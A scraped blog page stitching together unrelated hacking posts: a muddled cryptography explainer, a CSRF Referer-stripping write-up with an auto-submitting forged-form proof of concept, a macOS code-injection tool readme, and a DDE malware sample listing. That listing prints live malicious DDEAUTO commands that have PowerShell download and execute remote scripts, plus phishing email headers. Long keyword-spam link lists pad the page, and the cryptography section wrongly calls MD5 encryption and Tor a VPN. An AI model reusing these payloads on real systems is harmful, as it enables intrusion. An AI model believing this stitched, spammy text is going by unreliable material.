Pages

Monday, 31 August 2020

USE OF CRYPTOGRAPHY IN HACKING

WHAT IS CRYPTOGRAPHY?

The Cryptography is derived from the Greek words "Kryptos". This is the study of secure communication techniques that allow only the sender and recipient of a message to view it's contents of transforming information into nonhuman readable form or vice versa is called cryptography.

As we know that information plays a vital role in running of any business and organizations etc, sensitive details in the wrong hands can leads to loss of business.

Cryptography is the science of ciphering and deciphering messages.To secure communication organizations use cryptology to cipher information .

                            Or

Cryptography is a method of protecting information and communication through the use of codes so that only those whom the information is intended can read and process it.

In Computer Science, Cryptography refers to secure information and communication techniques derived from mathematical concepts , a set of rule based calculations called algorithm to transform message in ways the hard to readable for human.

This is one of the secure way of communications for a hacker with the help of virtual private network(VPN) like Tor Browser which is also very helpful to change the IP Address(Location of the sender ) for illegal purpose to perform crime in cyberspace . I will discuss in brief about the VPN .



How to Encrypt and Decrypt the text in Cryptography?

Open this website with the help of internert surfing for encryption-"http://wwwmd5online.org" 

Open the link for Decrypt the code text-"http://www.md5online.org/md5-decrypt.html"

Type whatever you want for encryption and it will crypt in the code form, copy that code and forward to the intended person whom you want for secure communication and then he/she will Decrypt in the real form.




               
       







Related news

CSRF Referer Header Strip

Intro

Most of the web applications I see are kinda binary when it comes to CSRF protection; either they have one implemented using CSRF tokens (and more-or-less covering the different functions of the web application) or there is no protection at all. Usually, it is the latter case. However, from time to time I see application checking the Referer HTTP header.

A couple months ago I had to deal with an application that was checking the Referer as a CSRF prevention mechanism, but when this header was stripped from the request, the CSRF PoC worked. BTW it is common practice to accept empty Referer, mainly to avoid breaking functionality.

The OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet tells us that this defense approach is a baaad omen, but finding a universal and simple solution on the Internetz to strip the Referer header took somewhat more time than I expected, so I decided that the stuff that I found might be useful for others too.

Solutions for Referer header strip

Most of the techniques I have found were way too complicated for my taste. For example, when I start reading a blog post from Egor Homakov to find a solution to a problem, I know that I am going to:
  1. learn something very cool;
  2. have a serious headache from all the new info at the end.
This blog post from him is a bit lighter and covers some useful theoretical background, so make sure you read that first before you continue reading this post. He shows a few nice tricks to strip the Referer, but I was wondering; maybe there is an easier way?

Rich Lundeen (aka WebstersProdigy) made an excellent blog post on stripping the Referer header (again, make sure you read that one first before you continue). The HTTPS to HTTP trick is probably the most well-known one, general and easy enough, but it quickly fails the moment you have an application that only runs over HTTPS (this was my case).

The data method is not browser independent but the about:blank trick works well for some simple requests. Unfortunately, in my case the request I had to attack with CSRF was too complex and I wanted to use XMLHttpRequest. He mentions that in theory, there is anonymous flag for CORS, but he could not get it work. I also tried it, but... it did not work for me either.

Krzysztof Kotowicz also wrote a blog post on Referer strip, coming to similar conclusions as Rich Lundeen, mostly using the data method.

Finally, I bumped into Johannes Ullrich's ISC diary on Referer header and that led to me W3C's Referrer Policy. So just to make a dumb little PoC and show that relying on Referer is a not a good idea, you can simply use the "referrer" meta tag (yes, that is two "r"-s there).

The PoC would look something like this:
<html>
<meta name="referrer" content="never">
<body>
<form action="https://vistimsite.com/function" method="POST">
<input type="hidden" name="param1" value="1" />
<input type="hidden" name="param2" value="2" />
...
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Conclusion

As you can see, there is quite a lot of ways to strip the Referer HTTP header from the request, so it really should not be considered a good defense against CSRF. My preferred way to make is PoC is with the meta tag, but hey, if you got any better solution for this, use the comment field down there and let me know! :)

More information


  1. Hack Tools 2019
  2. Nsa Hack Tools Download
  3. Hacking Tools Windows
  4. Pentest Tools For Mac
  5. New Hacker Tools
  6. Pentest Tools Review
  7. Hacking Tools For Windows Free Download
  8. Game Hacking
  9. Hack Apps
  10. How To Hack
  11. World No 1 Hacker Software
  12. Easy Hack Tools
  13. Hack Tools 2019
  14. Hacker Tools For Mac
  15. Hacking Tools Windows 10
  16. Hacker Search Tools
  17. Pentest Tools Url Fuzzer
  18. Hacker Tools Github
  19. Hacker Tools
  20. Hacking Tools Name
  21. Hack Tools
  22. Github Hacking Tools
  23. Hacking Tools Windows 10
  24. Usb Pentest Tools
  25. Pentest Tools Alternative
  26. Hacking Tools Mac
  27. Top Pentest Tools
  28. Hack Tools Github
  29. Hacking Tools
  30. Pentest Tools Download
  31. Hacking Tools For Beginners
  32. Hacking Tools Windows 10
  33. Pentest Tools Website
  34. Hack Tools
  35. Hacker Tools Software
  36. Pentest Tools Website Vulnerability
  37. New Hack Tools
  38. New Hack Tools
  39. Top Pentest Tools
  40. Pentest Tools Website Vulnerability
  41. Hacking Tools Windows
  42. Nsa Hacker Tools
  43. Hacking App
  44. Hackers Toolbox
  45. Termux Hacking Tools 2019
  46. Pentest Tools Alternative
  47. Top Pentest Tools
  48. Hacking Tools Windows
  49. Hacking Tools Pc
  50. Pentest Tools For Mac
  51. Underground Hacker Sites
  52. Easy Hack Tools
  53. Kik Hack Tools
  54. Hack Tools Online
  55. Hacking Tools Free Download
  56. Hacker Tools Hardware
  57. Hacking Tools For Mac
  58. Hacker Tools Linux
  59. Pentest Tools Android
  60. Termux Hacking Tools 2019
  61. Pentest Tools Open Source
  62. Pentest Tools List
  63. Hacker
  64. Black Hat Hacker Tools
  65. Best Hacking Tools 2019
  66. Hacking Tools For Beginners
  67. Hacking Tools Kit
  68. What Are Hacking Tools
  69. Black Hat Hacker Tools
  70. Hacking Tools For Pc
  71. Hacker Tools Windows
  72. Hacking Tools Windows
  73. Hack Rom Tools
  74. Tools 4 Hack
  75. Hackrf Tools
  76. Hacking Tools Pc
  77. Top Pentest Tools
  78. Hacker Tools For Ios
  79. Hacker Tools Hardware
  80. Beginner Hacker Tools
  81. Pentest Tools Website
  82. Hack Tool Apk No Root
  83. Hacking Tools Name
  84. Beginner Hacker Tools
  85. How To Hack
  86. Termux Hacking Tools 2019
  87. Pentest Tools Windows
  88. Termux Hacking Tools 2019
  89. Pentest Tools Alternative
  90. Hacking Tools Windows 10
  91. Pentest Tools List
  92. Hacker Tools List
  93. Hacking Apps
  94. Pentest Tools For Mac
  95. Hack Tool Apk No Root
  96. Hacking Tools For Mac
  97. Pentest Tools Github
  98. Hak5 Tools
  99. Hacker
  100. Hack Tool Apk No Root
  101. Install Pentest Tools Ubuntu
  102. Hacking Tools Online
  103. Pentest Tools Android
  104. Best Hacking Tools 2019
  105. Hacker Tools For Ios
  106. How To Hack
  107. Hacker Search Tools
  108. Tools Used For Hacking
  109. Tools For Hacker
  110. Hacker Tools Mac
  111. Hacker Tools Free Download
  112. Nsa Hack Tools
  113. Pentest Tools Website Vulnerability
  114. Hacker Tools Apk
  115. Hacking Tools For Beginners
  116. Easy Hack Tools
  117. Hack And Tools
  118. What Is Hacking Tools
  119. Hacking Tools Download
  120. Pentest Automation Tools
  121. Hacker Search Tools
  122. Hacking Tools For Beginners
  123. Hacking Tools And Software
  124. Pentest Tools Alternative
  125. Black Hat Hacker Tools
  126. Hack Apps
  127. Growth Hacker Tools
  128. Hack Tool Apk No Root
  129. Hacker Hardware Tools
  130. Hacking Tools Mac
  131. Pentest Tools Github
  132. Wifi Hacker Tools For Windows
  133. Hack Tools Mac
  134. Hackers Toolbox
  135. Pentest Tools Github
  136. Pentest Tools For Mac
  137. Growth Hacker Tools
  138. Nsa Hack Tools
  139. Hacking Tools Github
  140. Pentest Tools Apk
  141. Hacking Tools 2019
  142. Pentest Tools Port Scanner

Sunday, 30 August 2020

macSubstrate - Tool For Interprocess Code Injection On macOS


macSubstrate is a platform tool for interprocess code injection on macOS, with the similar function to Cydia Substrate on iOS. Using macSubstrate, you can inject your plugins (.bundle or .framework) into a mac app (including sandboxed apps) to tweak it in the runtime.
  • All you need is to get or create plugins for your target app.
  • No trouble with modification and codesign for the original target app.
  • No more work after the target app is updated.
  • Super easy to install or uninstall a plugin.
  • Loading plugins automatically whenever the target app is relaunched.
  • Providing a GUI app to make injection much easier.

Prepare
  • Disable SIP
  • Why should disable SIP
    System Integrity Protection is a new security policy that applies to every running process, including privileged code and code that runs out of the sandbox. The policy extends additional protections to components on disk and at run-time, only allowing system binaries to be modified by the system installer and software updates. Code injection and runtime attachments to system binaries are no longer permitted.

Usage
  1. download macSubstrate.app, put into /Applications and launch it.
    StatusBar
  2. grant authorization if needed.
  3. install a plugin by importing or dragging into macSubstrate.
    ToInstall
  4. launch the target app.
    step 3 and step 4 can be switched
    Once a plugin is installed by macSubstrate, it will take effect immediately. But if you want it to work whenever the target app is relaunched or macOS is restarted, you need to keep macSubstrate running and allow it to automatically launch at login.
  5. uninstall a plugin when you do not need it anymore.
    Installed

Plugin
macSubstrate supports plugins of .bundle or .framework, so you just need to create a valid .bundle or .framework file. The most important thing is to add a key macSubstratePlugin into the info.plist, with the dictionary value:
Key Value
TargetAppBundleID the target app's CFBundleIdentifier, this tells macSubstrate which app to inject.
Description brief description of the plugin
AuthorName author name of the plugin
AuthorEmail author email of the plugin
Please check the demo plugins demo.bundle and demo.framework for details.

Xcode Templates
macSubstrate also provides Xcode Templates to help you create plugins conveniently:
  1. ln -fhs ./macSubstratePluginTemplate ~/Library/Developer/Xcode/Templates/macSubstrate\ Plugin
  2. Launch Xcode, and there will be 2 new plugin templates for you.

Security
  1. SIP is a new security policy on macOS, which will help to keep you away from potential security risk. Disable it means you will lose the protection from SIP.
  2. If you install a plugin from a developer, you should be responsible for the security of the plugin. If you do not trust it, please do not install it. macSubstrate will help to verify the code signature of a plugin, and I suggest you to scan it using VirusTotal. Anyway, macSubstrate is just a tool, and it is your choice to decide what plugin to install.


More articles


  1. Hacking Tools Windows
  2. Hack Tool Apk No Root
  3. Hacker Tools For Windows
  4. Hacking Tools Free Download
  5. Hack Tools 2019
  6. Hacker Tools Apk
  7. Hack Tools
  8. Hacking Tools Pc
  9. Pentest Reporting Tools
  10. Pentest Tools Apk
  11. Pentest Tools Website
  12. New Hack Tools
  13. Pentest Tools Windows
  14. Pentest Tools Download
  15. Black Hat Hacker Tools
  16. Hacker Tools Github
  17. How To Install Pentest Tools In Ubuntu
  18. Hacker Tools For Ios
  19. New Hack Tools
  20. Pentest Tools Apk
  21. Hacker Tools For Ios
  22. Hacker Tools For Ios
  23. Hacker Tools For Mac
  24. Hacking Tools For Kali Linux
  25. Hack Tools For Ubuntu
  26. Black Hat Hacker Tools
  27. Hackers Toolbox
  28. Free Pentest Tools For Windows
  29. Nsa Hacker Tools
  30. Growth Hacker Tools
  31. Pentest Reporting Tools
  32. Hack And Tools
  33. Hack Tools Online
  34. Pentest Tools Website Vulnerability
  35. Hacking Tools Windows 10
  36. Pentest Tools Tcp Port Scanner
  37. Best Pentesting Tools 2018
  38. Hack Tools Download
  39. Hacker Tools Linux
  40. Hacking Tools For Windows
  41. Hacking Tools For Windows 7
  42. Hack Tools For Games
  43. Hacker Tools Apk
  44. Hacker Tools Software
  45. Pentest Tools Linux
  46. Hacker Tools Hardware
  47. Pentest Automation Tools
  48. Best Pentesting Tools 2018
  49. Hacker Techniques Tools And Incident Handling
  50. Termux Hacking Tools 2019
  51. Underground Hacker Sites
  52. Hack Tools
  53. Hacker Tools For Ios
  54. Hack Tools For Windows
  55. Hacking Tools Free Download
  56. Pentest Reporting Tools
  57. Pentest Recon Tools
  58. Hacking Tools For Mac
  59. Hacking Tools And Software
  60. Hack Tool Apk
  61. Pentest Tools Open Source
  62. Hacker Tools Mac
  63. Hacking Tools Usb
  64. Top Pentest Tools
  65. Hack Tools Pc
  66. Pentest Tools Url Fuzzer
  67. Physical Pentest Tools

DDE Command Execution Malware Samples






Here are a few samples related to the recent DDE Command execution






Reading:
10/18/2017 InQuest/yara-rules 
10/18/2017 https://twitter.com/i/moments/918126999738175489 


Download


File information
List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

Payload 
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a


9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460


10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450


Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
 4f3a6e16950b92bf9bd4efe8bbff9a1e

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
09d71f068d2bbca9fac090bde74e762b








Message information


For the EDGAR campaign
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

 Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236])
by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
(envelope-from <EDGAR@sec.gov>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <EDGAR@sec.gov>
Reply-To: EDGAR <EDGAR@sec.gov>
Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
X-AntiAbuse: Original Domain - nu.com
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain - sec.gov
X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
 signatures=0
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000
 definitions=main-1710110060

This is a multi-part message in MIME format.

--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: multipart/alternative;
boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"

--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings


--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>



--b2_7608a3de5fe6c9bf7df6782a8aa9790f--

--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx

<snip>


--b1_7608a3de5fe6c9bf7df6782a8aa9790f--


for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by
 AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by
 VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000
Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
 (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct
 2017 10:45:14 +0000
Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
 VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
 SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend
 Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by
 DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id
 15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> (10.234.178.186) by
 <snip>(10.144.20.58) with Microsoft SMTP
 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> (10.234.174.102) by
 <snip> with Microsoft SMTP Server
 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by
 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
 11:43:38 +0100 (CET)
Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by
 rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
 12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by
 rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
 11:43:36 +0100
Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
 [188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
 <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
 (BST)
Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
 certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
received-spf: Fail (protection.outlook.com: domain of <snip> does
 not designate 147.152.120.47 as permitted sender)
 receiver=protection.outlook.com; client-ip=147.152.120.47;
 helo=<snip>;
x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"
MIME-Version: 1.0

Related posts